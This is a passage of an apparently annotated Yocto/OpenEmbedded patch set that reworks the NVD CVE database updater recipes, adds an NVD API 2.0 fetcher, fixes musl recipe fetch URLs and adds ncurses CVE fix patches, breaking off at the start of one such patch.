echo 'export OECORE_NATIVE_SYSROOT="${SDKPATHNATIVE}"' >> $script
echo 'export GIT_SSL_CAINFO="${SDKPATHNATIVE}${sysconfdir}/ssl/certs/ca-certificates.crt"' >>$script
echo 'export SSL_CERT_FILE="${SDKPATHNATIVE}${sysconfdir}/ssl/certs/ca-certificates.crt"' >>$script
diff --git a/meta/recipes-core/meta/cve-update-db-native.bb b/meta/recipes-core/meta/cve-update-db-native.bb
index 0cd3a1c153..efc32470d3 100644
--- a/meta/recipes-core/meta/cve-update-db-native.bb
+++ b/meta/recipes-core/meta/cve-update-db-native.bb
@@ -12,28 +12,76 @@ deltask do_compile
deltask do_install
deltask do_populate_sysroot
+# CVE database update interval, in seconds. By default: once a day (24*60*60).
+# Use 0 to force the update
+# Use a negative value to skip the update
+CVE_DB_UPDATE_INTERVAL ?= "86400"
+
+# Timeout for blocking socket operations, such as the connection attempt.
+CVE_SOCKET_TIMEOUT ?= "60"
+NVDCVE_URL ?= "https://nvd.nist.gov/feeds/json/cve/1.1/nvdcve-1.1-"
+
+CVE_DB_TEMP_FILE ?= "${CVE_CHECK_DB_DIR}/temp_nvdcve_1.1.db"
+
python () {
if not bb.data.inherits_class("cve-check", d):
raise bb.parse.SkipRecipe("Skip recipe when cve-check class is not loaded.")
}
-python do_populate_cve_db() {
+python do_fetch() {
"""
Update NVD database with json data feed
"""
import bb.utils
import bb.progress
- import sqlite3, urllib, urllib.parse, shutil, gzip
- from datetime import date
+ import shutil
bb.utils.export_proxies(d)
- BASE_URL = "https://nvd.nist.gov/feeds/json/cve/1.1/nvdcve-1.1-"
- YEAR_START = 2002
-
db_file = d.getVar("CVE_CHECK_DB_FILE")
db_dir = os.path.dirname(db_file)
+ db_tmp_file = d.getVar("CVE_DB_TEMP_FILE")
+
+ cleanup_db_download(db_file, db_tmp_file)
+
+ # The NVD database changes once a day, so no need to update more frequently
+ # Allow the user to force-update
+ try:
+ import time
+ update_interval = int(d.getVar("CVE_DB_UPDATE_INTERVAL"))
+ if update_interval < 0:
+ bb.note("CVE database update skipped")
+ return
+ if time.time() - os.path.getmtime(db_file) < update_interval:
+ return
+ except OSError:
+ pass
+
+ bb.utils.mkdirhier(db_dir)
+ if os.path.exists(db_file):
+ shutil.copy2(db_file, db_tmp_file)
+
+ if update_db_file(db_tmp_file, d) == True:
+ # Update downloaded correctly, can swap files
+ shutil.move(db_tmp_file, db_file)
+ else:
+ # Update failed, do not modify the database
+ bb.note("CVE database update failed")
+ os.remove(db_tmp_file)
+}
+
+do_fetch[lockfiles] += "${CVE_CHECK_DB_FILE_LOCK}"
+do_fetch[file-checksums] = ""
+do_fetch[vardeps] = ""
+
+def cleanup_db_download(db_file, db_tmp_file):
+ """
+ Cleanup the download space from possible failed downloads
+ """
+
+ # Clean up the updates done on the main file
+ # Remove it only if a journal file exists - it means a complete re-download
if os.path.exists("{0}-journal".format(db_file)):
# If a journal is present the last update might have been interrupted. In that case,
# just wipe any leftovers and force the DB to be recreated.
@@ -42,37 +90,50 @@ python do_populate_cve_db() {
if os.path.exists(db_file):
os.remove(db_file)
- # Don't refresh the database more than once an hour
- try:
- import time
- if time.time() - os.path.getmtime(db_file) < (60*60):
- return
- except OSError:
- pass
+ # Clean-up the temporary file downloads, we can remove both journal
+ # and the temporary database
+ if os.path.exists("{0}-journal".format(db_tmp_file)):
+ # If a journal is present the last update might have been interrupted. In that case,
+ # just wipe any leftovers and force the DB to be recreated.
+ os.remove("{0}-journal".format(db_tmp_file))
- bb.utils.mkdirhier(db_dir)
+ if os.path.exists(db_tmp_file):
+ os.remove(db_tmp_file)
- # Connect to database
- conn = sqlite3.connect(db_file)
- c = conn.cursor()
+def update_db_file(db_tmp_file, d):
+ """
+ Update the given database file
+ """
+ import bb.utils, bb.progress
+ from datetime import date
+ import urllib, gzip, sqlite3
+
+ YEAR_START = 2002
+ cve_socket_timeout = int(d.getVar("CVE_SOCKET_TIMEOUT"))
- initialize_db(c)
+ # Connect to database
+ conn = sqlite3.connect(db_tmp_file)
+ initialize_db(conn)
with bb.progress.ProgressHandler(d) as ph, open(os.path.join(d.getVar("TMPDIR"), 'cve_check'), 'a') as cve_f:
total_years = date.today().year + 1 - YEAR_START
for i, year in enumerate(range(YEAR_START, date.today().year + 1)):
+ bb.debug(2, "Updating %d" % year)
ph.update((float(i + 1) / total_years) * 100)
- year_url = BASE_URL + str(year)
+ year_url = (d.getVar('NVDCVE_URL')) + str(year)
meta_url = year_url + ".meta"
json_url = year_url + ".json.gz"
# Retrieve meta last modified date
try:
- response = urllib.request.urlopen(meta_url)
+ response = urllib.request.urlopen(meta_url, timeout=cve_socket_timeout)
except urllib.error.URLError as e:
cve_f.write('Warning: CVE db update error, Unable to fetch CVE data.\n\n')
- bb.warn("Failed to fetch CVE data (%s)" % e.reason)
- return
+ bb.warn("Failed to fetch CVE data (%s)" % e)
+ import socket
+ result = socket.getaddrinfo("nvd.nist.gov", 443, proto=socket.IPPROTO_TCP)
+ bb.warn("Host IPs are %s" % (", ".join(t[4][0] for t in result)))
+ return False
if response:
for l in response.read().decode("utf-8").splitlines():
@@ -82,64 +143,81 @@ python do_populate_cve_db() {
break
else:
bb.warn("Cannot parse CVE metadata, update failed")
- return
+ return False
# Compare with current db last modified date
- c.execute("select DATE from META where YEAR = ?", (year,))
- meta = c.fetchone()
+ cursor = conn.execute("select DATE from META where YEAR = ?", (year,))
+ meta = cursor.fetchone()
+ cursor.close()
+
if not meta or meta[0] != last_modified:
+ bb.debug(2, "Updating entries")
# Clear products table entries corresponding to current year
- c.execute("delete from PRODUCTS where ID like ?", ('CVE-%d%%' % year,))
+ conn.execute("delete from PRODUCTS where ID like ?", ('CVE-%d%%' % year,)).close()
# Update db with current year json file
try:
- response = urllib.request.urlopen(json_url)
+ response = urllib.request.urlopen(json_url, timeout=cve_socket_timeout)
if response:
- update_db(c, gzip.decompress(response.read()).decode('utf-8'))
- c.execute("insert or replace into META values (?, ?)", [year, last_modified])
+ update_db(conn, gzip.decompress(response.read()).decode('utf-8'))
+ conn.execute("insert or replace into META values (?, ?)", [year, last_modified]).close()
except urllib.error.URLError as e:
cve_f.write('Warning: CVE db update error, CVE data is outdated.\n\n')
bb.warn("Cannot parse CVE data (%s), update failed" % e.reason)
- return
-
+ return False
+ else:
+ bb.debug(2, "Already up to date (last modified %s)" % last_modified)
# Update success, set the date to cve_check file.
if year == date.today().year:
cve_f.write('CVE database update : %s\n\n' % date.today())
conn.commit()
conn.close()
-}
+ return True
-do_populate_cve_db[lockfiles] += "${CVE_CHECK_DB_FILE_LOCK}"
+def initialize_db(conn):
+ with conn:
+ c = conn.cursor()
-def initialize_db(c):
- c.execute("CREATE TABLE IF NOT EXISTS META (YEAR INTEGER UNIQUE, DATE TEXT)")
+ c.execute("CREATE TABLE IF NOT EXISTS META (YEAR INTEGER UNIQUE, DATE TEXT)")
- c.execute("CREATE TABLE IF NOT EXISTS NVD (ID TEXT UNIQUE, SUMMARY TEXT, \
- SCOREV2 TEXT, SCOREV3 TEXT, MODIFIED INTEGER, VECTOR TEXT)")
+ c.execute("CREATE TABLE IF NOT EXISTS NVD (ID TEXT UNIQUE, SUMMARY TEXT, \
+ SCOREV2 TEXT, SCOREV3 TEXT, MODIFIED INTEGER, VECTOR TEXT)")
- c.execute("CREATE TABLE IF NOT EXISTS PRODUCTS (ID TEXT, \
- VENDOR TEXT, PRODUCT TEXT, VERSION_START TEXT, OPERATOR_START TEXT, \
- VERSION_END TEXT, OPERATOR_END TEXT)")
- c.execute("CREATE INDEX IF NOT EXISTS PRODUCT_ID_IDX on PRODUCTS(ID);")
+ c.execute("CREATE TABLE IF NOT EXISTS PRODUCTS (ID TEXT, \
+ VENDOR TEXT, PRODUCT TEXT, VERSION_START TEXT, OPERATOR_START TEXT, \
+ VERSION_END TEXT, OPERATOR_END TEXT)")
+ c.execute("CREATE INDEX IF NOT EXISTS PRODUCT_ID_IDX on PRODUCTS(ID);")
-def parse_node_and_insert(c, node, cveId):
+ c.close()
+
+def parse_node_and_insert(conn, node, cveId):
# Parse children node if needed
for child in node.get('children', ()):
- parse_node_and_insert(c, child, cveId)
+ parse_node_and_insert(conn, child, cveId)
def cpe_generator():
for cpe in node.get('cpe_match', ()):
if not cpe['vulnerable']:
return
- cpe23 = cpe['cpe23Uri'].split(':')
+ cpe23 = cpe.get('cpe23Uri')
+ if not cpe23:
+ return
+ cpe23 = cpe23.split(':')
+ if len(cpe23) < 6:
+ return
vendor = cpe23[3]
product = cpe23[4]
version = cpe23[5]
+ if cpe23[6] == '*' or cpe23[6] == '-':
+ version_suffix = ""
+ else:
+ version_suffix = "_" + cpe23[6]
+
if version != '*' and version != '-':
# Version is defined, this is a '=' match
- yield [cveId, vendor, product, version, '=', '', '']
+ yield [cveId, vendor, product, version + version_suffix, '=', '', '']
elif version == '-':
# no version information is available
yield [cveId, vendor, product, version, '', '', '']
@@ -166,11 +244,16 @@ def parse_node_and_insert(c, node, cveId):
op_end = '<'
v_end = cpe['versionEndExcluding']
- yield [cveId, vendor, product, v_start, op_start, v_end, op_end]
+ if op_start or op_end or v_start or v_end:
+ yield [cveId, vendor, product, v_start, op_start, v_end, op_end]
+ else:
+ # This is no version information, expressed differently.
+ # Save processing by representing as -.
+ yield [cveId, vendor, product, '-', '', '', '']
- c.executemany("insert into PRODUCTS values (?, ?, ?, ?, ?, ?, ?)", cpe_generator())
+ conn.executemany("insert into PRODUCTS values (?, ?, ?, ?, ?, ?, ?)", cpe_generator()).close()
-def update_db(c, jsondata):
+def update_db(conn, jsondata):
import json
root = json.loads(jsondata)
@@ -194,15 +277,14 @@ def update_db(c, jsondata):
accessVector = accessVector or "UNKNOWN"
cvssv3 = 0.0
- c.execute("insert or replace into NVD values (?, ?, ?, ?, ?, ?)",
- [cveId, cveDesc, cvssv2, cvssv3, date, accessVector])
+ conn.execute("insert or replace into NVD values (?, ?, ?, ?, ?, ?)",
+ [cveId, cveDesc, cvssv2, cvssv3, date, accessVector]).close()
configurations = elt['configurations']['nodes']
for config in configurations:
- parse_node_and_insert(c, config, cveId)
+ parse_node_and_insert(conn, config, cveId)
-addtask do_populate_cve_db before do_fetch
-do_populate_cve_db[nostamp] = "1"
+do_fetch[nostamp] = "1"
EXCLUDE_FROM_WORLD = "1"
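
The refresh logic above follows a guard-then-swap pattern: skip the download when the database is newer than CVE_DB_UPDATE_INTERVAL, stage the update in CVE_DB_TEMP_FILE, and only replace the real database once the download succeeded. A minimal standalone sketch of that pattern follows (the fetch_nvd_data callback is hypothetical; BitBake specifics such as bb.note and the lockfile handling are omitted):

    import os
    import shutil
    import time

    UPDATE_INTERVAL = 24 * 60 * 60  # once a day, mirroring CVE_DB_UPDATE_INTERVAL

    def refresh_db(db_file, db_tmp_file, fetch_nvd_data):
        try:
            if time.time() - os.path.getmtime(db_file) < UPDATE_INTERVAL:
                return True              # recently updated, nothing to do
        except OSError:
            pass                         # no database yet, fall through and build it

        if os.path.exists(db_file):
            shutil.copy2(db_file, db_tmp_file)   # work on a staging copy

        if fetch_nvd_data(db_tmp_file):
            shutil.move(db_tmp_file, db_file)    # swap in only on success
            return True

        if os.path.exists(db_tmp_file):
            os.remove(db_tmp_file)               # keep the old database untouched
        return False

The same staging approach is reused by the NVD API 2.0 updater added below.
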
diff --git a/meta/recipes-core/meta/cve-update-nvd2-native.bb b/meta/recipes-core/meta/cve-update-nvd2-native.bb
new file mode 100644
index 0000000000..1a3eeba6d0
--- /dev/null
+++ b/meta/recipes-core/meta/cve-update-nvd2-native.bb
@@ -0,0 +1,372 @@
+SUMMARY = "Updates the NVD CVE database"
+LICENSE = "MIT"
+
+# Important note:
+# This product uses the NVD API but is not endorsed or certified by the NVD.
+
+INHIBIT_DEFAULT_DEPS = "1"
+
+inherit native
+
+deltask do_unpack
+deltask do_patch
+deltask do_configure
+deltask do_compile
+deltask do_install
+deltask do_populate_sysroot
+
+NVDCVE_URL ?= "https://services.nvd.nist.gov/rest/json/cves/2.0"
+
+# If you have an NVD API key (https://nvd.nist.gov/developers/request-an-api-key)
+# then set this to get higher rate limits.
+NVDCVE_API_KEY ?= ""
+
+# CVE database update interval, in seconds. By default: once a day (24*60*60).
+# Use 0 to force the update
+# Use a negative value to skip the update
+CVE_DB_UPDATE_INTERVAL ?= "86400"
+
+# CVE database incremental update age threshold, in seconds. If the database is
+# older than this threshold, do a full re-download; otherwise, do an incremental
+# update. By default: the maximum allowed value from NVD: 120 days (120*24*60*60)
+# Use 0 to force a full download.
+CVE_DB_INCR_UPDATE_AGE_THRES ?= "10368000"
+
+# Number of attempts for each http query to nvd server before giving up
+CVE_DB_UPDATE_ATTEMPTS ?= "5"
+
+CVE_DB_TEMP_FILE ?= "${CVE_CHECK_DB_DIR}/temp_nvdcve_2.db"
+
+python () {
+ if not bb.data.inherits_class("cve-check", d):
+ raise bb.parse.SkipRecipe("Skip recipe when cve-check class is not loaded.")
+}
+
+python do_fetch() {
+ """
+ Update NVD database with API 2.0
+ """
+ import bb.utils
+ import bb.progress
+ import shutil
+
+ bb.utils.export_proxies(d)
+
+ db_file = d.getVar("CVE_CHECK_DB_FILE")
+ db_dir = os.path.dirname(db_file)
+ db_tmp_file = d.getVar("CVE_DB_TEMP_FILE")
+
+ cleanup_db_download(db_file, db_tmp_file)
+ # By default let's update the whole database (since time 0)
+ database_time = 0
+
+ # The NVD database changes once a day, so no need to update more frequently
+ # Allow the user to force-update
+ try:
+ import time
+ update_interval = int(d.getVar("CVE_DB_UPDATE_INTERVAL"))
+ if update_interval < 0:
+ bb.note("CVE database update skipped")
+ return
+ if time.time() - os.path.getmtime(db_file) < update_interval:
+ bb.note("CVE database recently updated, skipping")
+ return
+ database_time = os.path.getmtime(db_file)
+
+ except OSError:
+ pass
+
+ bb.utils.mkdirhier(db_dir)
+ if os.path.exists(db_file):
+ shutil.copy2(db_file, db_tmp_file)
+
+ if update_db_file(db_tmp_file, d, database_time) == True:
+ # Update downloaded correctly, can swap files
+ shutil.move(db_tmp_file, db_file)
+ else:
+ # Update failed, do not modify the database
+ bb.warn("CVE database update failed")
+ os.remove(db_tmp_file)
+}
+
+do_fetch[lockfiles] += "${CVE_CHECK_DB_FILE_LOCK}"
+do_fetch[file-checksums] = ""
+do_fetch[vardeps] = ""
+
+def cleanup_db_download(db_file, db_tmp_file):
+ """
+ Cleanup the download space from possible failed downloads
+ """
+
+ # Clean up the updates done on the main file
+ # Remove it only if a journal file exists - it means a complete re-download
+ if os.path.exists("{0}-journal".format(db_file)):
+ # If a journal is present the last update might have been interrupted. In that case,
+ # just wipe any leftovers and force the DB to be recreated.
+ os.remove("{0}-journal".format(db_file))
+
+ if os.path.exists(db_file):
+ os.remove(db_file)
+
+ # Clean-up the temporary file downloads, we can remove both journal
+ # and the temporary database
+ if os.path.exists("{0}-journal".format(db_tmp_file)):
+ # If a journal is present the last update might have been interrupted. In that case,
+ # just wipe any leftovers and force the DB to be recreated.
+ os.remove("{0}-journal".format(db_tmp_file))
+
+ if os.path.exists(db_tmp_file):
+ os.remove(db_tmp_file)
+
+def nvd_request_wait(attempt, min_wait):
+ return min ( ( (2 * attempt) + min_wait ) , 30)
+
+def nvd_request_next(url, attempts, api_key, args, min_wait):
+ """
+ Request next part of the NVD database
+ NVD API documentation: https://nvd.nist.gov/developers/vulnerabilities
+ """
+
+ import urllib.request
+ import urllib.parse
+ import gzip
+ import http
+ import time
+
+ request = urllib.request.Request(url + "?" + urllib.parse.urlencode(args))
+ if api_key:
+ request.add_header("apiKey", api_key)
+ bb.note("Requesting %s" % request.full_url)
+
+ for attempt in range(attempts):
+ try:
+ r = urllib.request.urlopen(request)
+
+ if (r.headers['content-encoding'] == 'gzip'):
+ buf = r.read()
+ raw_data = gzip.decompress(buf).decode("utf-8")
+ else:
+ raw_data = r.read().decode("utf-8")
+
+ r.close()
+
+ except Exception as e:
+ wait_time = nvd_request_wait(attempt, min_wait)
+ bb.note("CVE database: received error (%s)" % (e))
+ bb.note("CVE database: retrying download after %d seconds. attempted (%d/%d)" % (wait_time, attempt+1, attempts))
+ time.sleep(wait_time)
+ pass
+ else:
+ return raw_data
+ else:
+ # We failed at all attempts
+ return None
+
+def update_db_file(db_tmp_file, d, database_time):
+ """
+ Update the given database file
+ """
+ import bb.utils, bb.progress
+ import datetime, time   # time is needed for the inter-page sleep below
+ import sqlite3
+ import json
+
+ # Connect to database
+ conn = sqlite3.connect(db_tmp_file)
+ initialize_db(conn)
+
+ req_args = {'startIndex' : 0}
+
+ incr_update_threshold = int(d.getVar("CVE_DB_INCR_UPDATE_AGE_THRES"))
+ if database_time != 0:
+ database_date = datetime.datetime.fromtimestamp(database_time, tz=datetime.timezone.utc)
+ today_date = datetime.datetime.now(tz=datetime.timezone.utc)
+ delta = today_date - database_date
+ if incr_update_threshold == 0:
+ bb.note("CVE database: forced full update")
+ elif delta < datetime.timedelta(seconds=incr_update_threshold):
+ bb.note("CVE database: performing partial update")
+ # The maximum range for time is 120 days
+ if delta > datetime.timedelta(days=120):
+ bb.error("CVE database: Trying to do an incremental update on a larger than supported range")
+ req_args['lastModStartDate'] = database_date.isoformat()
+ req_args['lastModEndDate'] = today_date.isoformat()
+ else:
+ bb.note("CVE database: file too old, forcing a full update")
+ else:
+ bb.note("CVE database: no preexisting database, do a full download")
+
+ with bb.progress.ProgressHandler(d) as ph, open(os.path.join(d.getVar("TMPDIR"), 'cve_check'), 'a') as cve_f:
+
+ bb.note("Updating entries")
+ index = 0
+ url = d.getVar("NVDCVE_URL")
+ api_key = d.getVar("NVDCVE_API_KEY") or None
+ attempts = int(d.getVar("CVE_DB_UPDATE_ATTEMPTS"))
+
+ # Recommended by NVD
+ wait_time = 6
+ if api_key:
+ wait_time = 2
+
+ while True:
+ req_args['startIndex'] = index
+ raw_data = nvd_request_next(url, attempts, api_key, req_args, wait_time)
+ if raw_data is None:
+ # We haven't managed to download data
+ return False
+
+ data = json.loads(raw_data)
+
+ index = data["startIndex"]
+ total = data["totalResults"]
+ per_page = data["resultsPerPage"]
+ bb.note("Got %d entries" % per_page)
+ for cve in data["vulnerabilities"]:
+ update_db(conn, cve)
+
+ index += per_page
+ ph.update((float(index) / (total+1)) * 100)
+ if index >= total:
+ break
+
+ # Recommended by NVD
+ time.sleep(wait_time)
+
+ # Update success, set the date to cve_check file.
+ cve_f.write('CVE database update : %s\n\n' % datetime.date.today())
+
+ conn.commit()
+ conn.close()
+ return True
+
+def initialize_db(conn):
+ with conn:
+ c = conn.cursor()
+
+ c.execute("CREATE TABLE IF NOT EXISTS META (YEAR INTEGER UNIQUE, DATE TEXT)")
+
+ c.execute("CREATE TABLE IF NOT EXISTS NVD (ID TEXT UNIQUE, SUMMARY TEXT, \
+ SCOREV2 TEXT, SCOREV3 TEXT, MODIFIED INTEGER, VECTOR TEXT)")
+
+ c.execute("CREATE TABLE IF NOT EXISTS PRODUCTS (ID TEXT, \
+ VENDOR TEXT, PRODUCT TEXT, VERSION_START TEXT, OPERATOR_START TEXT, \
+ VERSION_END TEXT, OPERATOR_END TEXT)")
+ c.execute("CREATE INDEX IF NOT EXISTS PRODUCT_ID_IDX on PRODUCTS(ID);")
+
+ c.close()
+
+def parse_node_and_insert(conn, node, cveId):
+
+ def cpe_generator():
+ for cpe in node.get('cpeMatch', ()):
+ if not cpe['vulnerable']:
+ return
+ cpe23 = cpe.get('criteria')
+ if not cpe23:
+ return
+ cpe23 = cpe23.split(':')
+ if len(cpe23) < 6:
+ return
+ vendor = cpe23[3]
+ product = cpe23[4]
+ version = cpe23[5]
+
+ if cpe23[6] == '*' or cpe23[6] == '-':
+ version_suffix = ""
+ else:
+ version_suffix = "_" + cpe23[6]
+
+ if version != '*' and version != '-':
+ # Version is defined, this is a '=' match
+ yield [cveId, vendor, product, version + version_suffix, '=', '', '']
+ elif version == '-':
+ # no version information is available
+ yield [cveId, vendor, product, version, '', '', '']
+ else:
+ # Parse start version, end version and operators
+ op_start = ''
+ op_end = ''
+ v_start = ''
+ v_end = ''
+
+ if 'versionStartIncluding' in cpe:
+ op_start = '>='
+ v_start = cpe['versionStartIncluding']
+
+ if 'versionStartExcluding' in cpe:
+ op_start = '>'
+ v_start = cpe['versionStartExcluding']
+
+ if 'versionEndIncluding' in cpe:
+ op_end = '<='
+ v_end = cpe['versionEndIncluding']
+
+ if 'versionEndExcluding' in cpe:
+ op_end = '<'
+ v_end = cpe['versionEndExcluding']
+
+ if op_start or op_end or v_start or v_end:
+ yield [cveId, vendor, product, v_start, op_start, v_end, op_end]
+ else:
+ # This is no version information, expressed differently.
+ # Save processing by representing as -.
+ yield [cveId, vendor, product, '-', '', '', '']
+
+ conn.executemany("insert into PRODUCTS values (?, ?, ?, ?, ?, ?, ?)", cpe_generator()).close()
+
+def update_db(conn, elt):
+ """
+ Update a single entry in the on-disk database
+ """
+
+ accessVector = None
+ cveId = elt['cve']['id']
+ if elt['cve']['vulnStatus'] == "Rejected":
+ c = conn.cursor()
+ c.execute("delete from PRODUCTS where ID = ?;", [cveId])
+ c.execute("delete from NVD where ID = ?;", [cveId])
+ c.close()
+ return
+ cveDesc = ""
+ for desc in elt['cve']['descriptions']:
+ if desc['lang'] == 'en':
+ cveDesc = desc['value']
+ date = elt['cve']['lastModified']
+ try:
+ accessVector = elt['cve']['metrics']['cvssMetricV2'][0]['cvssData']['accessVector']
+ cvssv2 = elt['cve']['metrics']['cvssMetricV2'][0]['cvssData']['baseScore']
+ except KeyError:
+ cvssv2 = 0.0
+ cvssv3 = None
+ try:
+ accessVector = accessVector or elt['cve']['metrics']['cvssMetricV30'][0]['cvssData']['attackVector']
+ cvssv3 = elt['cve']['metrics']['cvssMetricV30'][0]['cvssData']['baseScore']
+ except KeyError:
+ pass
+ try:
+ accessVector = accessVector or elt['cve']['metrics']['cvssMetricV31'][0]['cvssData']['attackVector']
+ cvssv3 = cvssv3 or elt['cve']['metrics']['cvssMetricV31'][0]['cvssData']['baseScore']
+ except KeyError:
+ pass
+ accessVector = accessVector or "UNKNOWN"
+ cvssv3 = cvssv3 or 0.0
+
+ conn.execute("insert or replace into NVD values (?, ?, ?, ?, ?, ?)",
+ [cveId, cveDesc, cvssv2, cvssv3, date, accessVector]).close()
+
+ try:
+ # Remove any pre-existing CVE configuration. Even for partial database
+ # update, those will be repopulated. This ensures that old
+ # configuration is not kept for an updated CVE.
+ conn.execute("delete from PRODUCTS where ID = ?", [cveId]).close()
+ for config in elt['cve']['configurations']:
+ # This is suboptimal as it doesn't handle AND/OR and negate, but is better than nothing
+ for node in config["nodes"]:
+ parse_node_and_insert(conn, node, cveId)
+ except KeyError:
+ bb.note("CVE %s has no configurations" % cveId)
+
+do_fetch[nostamp] = "1"
+
+EXCLUDE_FROM_WORLD = "1"
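To make the mapping above concrete, here is a minimal sketch that feeds one hypothetical NVD 2.0 cpeMatch node through parse_node_and_insert() into an in-memory copy of the PRODUCTS table; the node contents, the CVE id and running the recipe's function as plain Python are assumptions for illustration only:

import sqlite3

# Hypothetical NVD 2.0 configuration node, shaped like the JSON iterated above
node = {
    "cpeMatch": [
        {"vulnerable": True,
         "criteria": "cpe:2.3:a:gnu:bash:*:*:*:*:*:*:*:*",
         "versionStartIncluding": "4.0",
         "versionEndExcluding": "5.0"}
    ]
}

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE PRODUCTS (ID TEXT, VENDOR TEXT, PRODUCT TEXT, "
             "VERSION_START TEXT, OPERATOR_START TEXT, VERSION_END TEXT, OPERATOR_END TEXT)")
parse_node_and_insert(conn, node, "CVE-0000-0000")  # function defined in the recipe above
print(conn.execute("SELECT * FROM PRODUCTS").fetchall())
# [('CVE-0000-0000', 'gnu', 'bash', '4.0', '>=', '5.0', '<')]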
diff --git a/meta/recipes-core/musl/libucontext_git.bb b/meta/recipes-core/musl/libucontext_git.bb
index ec988f1920..71beb80083 100644
--- a/meta/recipes-core/musl/libucontext_git.bb
+++ b/meta/recipes-core/musl/libucontext_git.bb
@@ -10,7 +10,7 @@ DEPENDS = ""
PV = "0.10+${SRCPV}"
SRCREV = "19fa1bbfc26efb92147b5e85cc0ca02a0e837561"
-SRC_URI = "git://github.com/kaniini/libucontext \
+SRC_URI = "git://github.com/kaniini/libucontext;branch=master;protocol=https \
"
S = "${WORKDIR}/git"
diff --git a/meta/recipes-core/musl/musl-obstack.bb b/meta/recipes-core/musl/musl-obstack.bb
index 3003935fe5..74de48c2cd 100644
--- a/meta/recipes-core/musl/musl-obstack.bb
+++ b/meta/recipes-core/musl/musl-obstack.bb
@@ -10,7 +10,7 @@ SECTION = "libs"
PV = "1.1"
SRCREV = "d2ad66b0df44a4b784956f7f7f2717131ddc05f4"
-SRC_URI = "git://github.com/pullmoll/musl-obstack"
+SRC_URI = "git://github.com/pullmoll/musl-obstack;branch=master;protocol=https"
UPSTREAM_CHECK_COMMITS = "1"
diff --git a/meta/recipes-core/musl/musl-utils.bb b/meta/recipes-core/musl/musl-utils.bb
index dd0ce33061..c30509469c 100644
--- a/meta/recipes-core/musl/musl-utils.bb
+++ b/meta/recipes-core/musl/musl-utils.bb
@@ -11,7 +11,7 @@ SECTION = "utils"
PV = "20170421"
SRCREV = "fb5630138ccabbbc14a19d372096a04e42573c7d"
-SRC_URI = "git://github.com/boltlinux/musl-utils"
+SRC_URI = "git://github.com/boltlinux/musl-utils;branch=master;protocol=https"
UPSTREAM_CHECK_COMMITS = "1"
diff --git a/meta/recipes-core/musl/musl_git.bb b/meta/recipes-core/musl/musl_git.bb
index 82379fd1c5..cbb56f4769 100644
--- a/meta/recipes-core/musl/musl_git.bb
+++ b/meta/recipes-core/musl/musl_git.bb
@@ -12,7 +12,7 @@ PV = "${BASEVER}+git${SRCPV}"
# mirror is at git://github.com/kraj/musl.git
-SRC_URI = "git://git.musl-libc.org/musl \
+SRC_URI = "git://git.musl-libc.org/musl;branch=master \
file://0001-Make-dynamic-linker-a-relative-symlink-to-libc.patch \
file://0002-ldso-Use-syslibdir-and-libdir-as-default-pathes-to-l.patch \
"
diff --git a/meta/recipes-core/ncurses/files/0003-gen-pkgconfig.in-Do-not-include-LDFLAGS-in-generated.patch b/meta/recipes-core/ncurses/files/0003-gen-pkgconfig.in-Do-not-include-LDFLAGS-in-generated.patch
new file mode 100644
index 0000000000..1eb17767a0
--- /dev/null
+++ b/meta/recipes-core/ncurses/files/0003-gen-pkgconfig.in-Do-not-include-LDFLAGS-in-generated.patch
@@ -0,0 +1,29 @@
+From 3b3e87934bb6d8511261d7c3d6e39b4f71849272 Mon Sep 17 00:00:00 2001
+From: Nathan Rossi <nathan@nathanrossi.com>
+Date: Mon, 14 Dec 2020 13:39:02 +1000
+Subject: [PATCH] gen-pkgconfig.in: Do not include LDFLAGS in generated pc
+ files
+
+Including the LDFLAGS in the pkgconfig output is problematic as OE
+includes build host specific paths and options (e.g. uninative and
+'-Wl,--dynamic-linker=').
+
+Upstream-Status: Inappropriate [OE Specific]
+Signed-off-by: Nathan Rossi <nathan@nathanrossi.com>
+---
+ misc/gen-pkgconfig.in | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/misc/gen-pkgconfig.in b/misc/gen-pkgconfig.in
+index 8f00b824b9..009d215663 100644
+--- a/misc/gen-pkgconfig.in
++++ b/misc/gen-pkgconfig.in
+@@ -80,7 +80,7 @@ if [ "$includedir" != "/usr/include" ]; then
+ fi
+
+ lib_flags=
+-for opt in -L$libdir @LDFLAGS@ @EXTRA_LDFLAGS@ @LIBS@
++for opt in -L$libdir @LIBS@
+ do
+ case $opt in
+ -l*) # LIBS is handled specially below
diff --git a/meta/recipes-core/ncurses/files/CVE-2021-39537.patch b/meta/recipes-core/ncurses/files/CVE-2021-39537.patch
new file mode 100644
index 0000000000..7655200350
--- /dev/null
+++ b/meta/recipes-core/ncurses/files/CVE-2021-39537.patch
@@ -0,0 +1,30 @@
+$NetBSD: patch-ncurses_tinfo_captoinfo.c,v 1.1 2021/10/09 07:52:36 wiz Exp $
+
+Fix for CVE-2021-39537 from upstream:
+https://github.com/ThomasDickey/ncurses-snapshots/commit/63ca9e061f4644795d6f3f559557f3e1ed8c738b#diff-7e95c7bc5f213e9be438e69a9d5d0f261a14952bcbd692f7b9014217b8047340
+
+CVE: CVE-2021-39537
+Upstream-Status: Backport [http://cvsweb.netbsd.org/bsdweb.cgi/pkgsrc/devel/ncurses/patches/Attic/patch-ncurses_tinfo_captoinfo.c?rev=1.1&content-type=text/x-cvsweb-markup]
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+
+--- a/ncurses/tinfo/captoinfo.c 2020-02-02 23:34:34.000000000 +0000
++++ b/ncurses/tinfo/captoinfo.c
+@@ -216,12 +216,15 @@ cvtchar(register const char *sp)
+ }
+ break;
+ case '^':
++ len = 2;
+ c = UChar(*++sp);
+- if (c == '?')
++ if (c == '?') {
+ c = 127;
+- else
++ } else if (c == '\0') {
++ len = 1;
++ } else {
+ c &= 0x1f;
+- len = 2;
++ }
+ break;
+ default:
+ c = UChar(*sp);
diff --git a/meta/recipes-core/ncurses/files/CVE-2022-29458.patch b/meta/recipes-core/ncurses/files/CVE-2022-29458.patch
new file mode 100644
index 0000000000..eb1b7c96f9
--- /dev/null
+++ b/meta/recipes-core/ncurses/files/CVE-2022-29458.patch
@@ -0,0 +1,135 @@
+From 5f40697e37e195069f55528fc7a1d77e619ad104 Mon Sep 17 00:00:00 2001
+From: Dan Tran <dantran@microsoft.com>
+Date: Fri, 13 May 2022 13:28:41 -0700
+Subject: [PATCH] ncurses 6.3 before patch 20220416 has an out-of-bounds read
+ and segmentation violation in convert_strings in tinfo/read_entry.c in the
+ terminfo library.
+
+CVE: CVE-2022-29458
